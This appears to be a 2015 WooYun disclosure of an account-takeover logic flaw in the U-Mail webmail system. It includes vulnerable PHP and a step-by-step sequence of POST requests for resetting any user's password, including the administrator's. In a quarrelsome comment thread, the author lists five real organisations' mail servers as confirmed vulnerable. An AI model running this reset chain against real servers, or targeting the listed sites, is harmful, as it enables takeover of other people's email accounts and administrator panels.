当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093249

漏洞标题:U-Mail邮件系统任意用户登录漏洞

相关厂商:U-Mail

漏洞作者: Ano_Tom

提交时间:2015-01-27 15:31

修复时间:2015-04-27 15:32

公开时间:2015-04-27 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经确认,细节仅向厂商公开
2015-02-04: 细节向第三方安全合作伙伴开放
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-04-27: 细节向公众公开

简要描述:

不多说了,这邮件系统问题简直太多,真揪心

详细说明:

漏洞文件
/fast/option/module/o_password.php代码

if ( ACTION == "question" )
{
		$url = "/webmail/fast/option/index.php?module=view&action=password";
		$where = "UserID='".$user_id."'";
		$data = array(
				"question" => gss( $_POST['question'] ),
				"answer" => gss( $_POST['answer'] )
		);
		$result = $Mailbox->update_info( $data, $where, 0 );//直接将获得的用户数据进行了update
		$msg = $result ? "" : "修改密码提示问题时出现错误,修改失败!";
		redirect( $url, $msg );
}
?>


找回密码过程是,首先提交要获得密码的用户名,获得一个phpsessid,如图
http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login post数据为mailbox=test0001@fuck.com&link=?
然后访问该方法,更新用户的密码提示问题和答案
http://mail.fuck.com/webmail/fast/option/index.php?module=operate&action=question post数据为question=hello&answer=tom改为自己设置的密码问题即可
然后执行找回密码方法,请求为
http://mail.fuck.com/webmail/getpass.php post数据为email=test0001%40fuck.com&question=hello&answer=tom&update=%E7%A1%AE%E8%AE%A4

a.png


这是找回任意普通用户的密码,由于管理员system也在该表里,所以我们可以将第一个请求换成mailbox=system@fuck.com&link=?,然后更新其密保问题,然后找回密码即可,如图

b.png


数据库为

c.png


d.png


其中,得到管理员密码后,http://mail.fuck.com/webmail/admin/ 在此处登录,登录即可操作整个邮箱系统,如图

e.png


批量获得system的就不演示了

漏洞证明:

如上

修复方案:

逻辑问题

版权声明:转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-01 10:48

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-27 15:50 | 你大爷 ( 实习白帽子 | Rank:84 漏洞数:19 | hdjdj)

    看来你是专注U-MaiL 30年啊

  2. 2015-02-21 20:39 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @你大爷 @Ano_Tom 这个漏洞错的,洞主报告的时候可能不严谨对ssid的规范检查。

  3. 2015-02-22 10:24 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    少年,如果没有本地测试不要瞎说,我刚又本地(Windows Server 2003+V9.857+默认设置)测试了下,没有任何问题,仍可复现。提交用户名就实现了任意用户的伪登录(并非能执行邮件的各个功能),然后利用伪登录执行敏感的修改密保问题的函数,即可。没有问题,新年快乐。:)

  4. 2015-02-22 10:24 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @黑暗游侠 少年,如果没有本地测试不要瞎说,我刚又本地(Windows Server 2003+V9.857+默认设置)测试了下,没有任何问题,仍可复现。提交用户名就实现了任意用户的伪登录(并非能执行邮件的各个功能),然后利用伪登录执行敏感的修改密保问题的函数,即可。没有问题,新年快乐。:)

  5. 2015-02-22 13:57 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Ano_Tom 您好洞主,新年快乐,请您根据任意shell执行里提供的N处互联网案例进行实际测试,我是测试过的,否则我不会这么说,已反馈给Finger,洞主你可以问下 @Finger @疯狗

  6. 2015-02-22 15:13 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @黑暗游侠 我只想问一句,我那300多个案例你都测试完了,然后得出“我的漏洞是错的”结论么?那个getshell无限制的是几乎通杀之前所有版本的,对于这个漏洞,可能不适用旧版本,或者即使是最新版可能已经更新等等。你不能不测了几个漏洞没复现,就得出这样的结论。我当时是本地测试的,成功复现,刚刚我随机从 WooYun: U-Mail邮件系统批量getshell(真正无限制,无需普通帐号) 案例里找了五个,可以重置system帐号的密保,同时可以获得密码,互联网案例也成功复现。地址为http://mail.jinpower.com/webmail/getpass.phphttp://mail.ygs-hn.com/webmail/getpass.phphttp://mail.letongink.com/webmail/getpass.phphttp://mail.pcac.org.cn/webmail/getpass.phphttp://mail.cmbsinolink.com/webmail/getpass.php百度网盘分享安装包,即相关截图证明http://pan.baidu.com/s/1gdtNkfp大过年的,别闹。@Xsser @Finger @疯狗

  7. 2015-02-22 16:57 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Ano_Tom 我电脑是win7,不然就能本地分析。你说的是通杀之前所有版本?这点就绝对不可能,官方最新的下载包是1月25号更新的exe安装程序,而你的提交日期是1月27号。所以你这个漏洞的确是有限制的,并不是任何案例都可以应用,至于限制在哪你再好好去摸索吧。

  8. 2015-02-22 21:17 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @黑暗游侠 你上来就我的漏洞是错误的,我给你更正,说本地测试成功了推翻你。然后你又说互联网案例测试不成功,我又给你互联网案例,推翻了你。我说上个getshell漏洞是几乎通杀,没说完全通杀。你现在又绕开之前的说法不提,说这个漏洞的确是有限制的,哪里有限制了?难道是因为不通杀,还是5个案例不多,所以有限制?呵呵,“并不是任何案例都可以应用”,我想问下有这样的通用型漏洞任何案例都可以应用的么?我得列出各个限制点给你么?比如不装安全狗?漏洞有限制的,你不废话么,之前所有的通用漏洞难道都没限制么?你没有实例具体分析代码,没有本地验证测试,没有完整的互联网案例分析不要妄自下这个漏洞是错误的结论。有限制,呵呵,已经随便举了5个互联网案例,直接重置系统管理员密码,有了危害就不算有限制,不鸡肋。有任何问题测试充分了再发,有任何问题反应给管理。@Xsser @Finger @疯狗 @肉肉

  9. 2015-02-23 11:59 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Ano_Tom 别慌,看你慌成这样。我指的限制说了安全狗么?5个案例很多么,你说推翻了我说的互联网案例,你都测试了算一下成功率再说ok?

  10. 2015-02-23 12:22 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @黑暗游侠 脑残

  11. 2015-02-23 12:57 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Ano_Tom 加油,你也就这点素质了

  12. 2015-02-23 13:22 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    啊,额,大过年的就吵呀。。

  13. 2015-02-23 14:18 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @肉肉 哈哈哈。

  14. 2015-03-12 16:57 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    这个伪登陆,可以执行fast目录下所有操作,这个版本是可行的啊

  15. 2015-03-12 21:02 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @玉林嘎 嗯,这个确实没什么问题,我找不出哪里是错的,哈哈

  16. 2015-03-12 22:29 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Ano_Tom 呵呵

  17. 2015-03-12 23:31 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    @黑暗游侠 我刚才本地复现了下 可以啊...

  18. 2015-03-13 09:45 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @玉林嘎 林子大了,什么鸟都有

  19. 2015-04-23 09:20 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @玉林嘎 怎么你这么早就知道漏洞详情?不科学呀

  20. 2015-04-23 09:22 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @Ano_Tom 说到底还是伪登录的问题 至于更新答案 前面应该有代码验证了会话 瞎猜的

  21. 2015-04-23 09:47 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @BMa 请本地测试,无验证的。瞎猜的,呵呵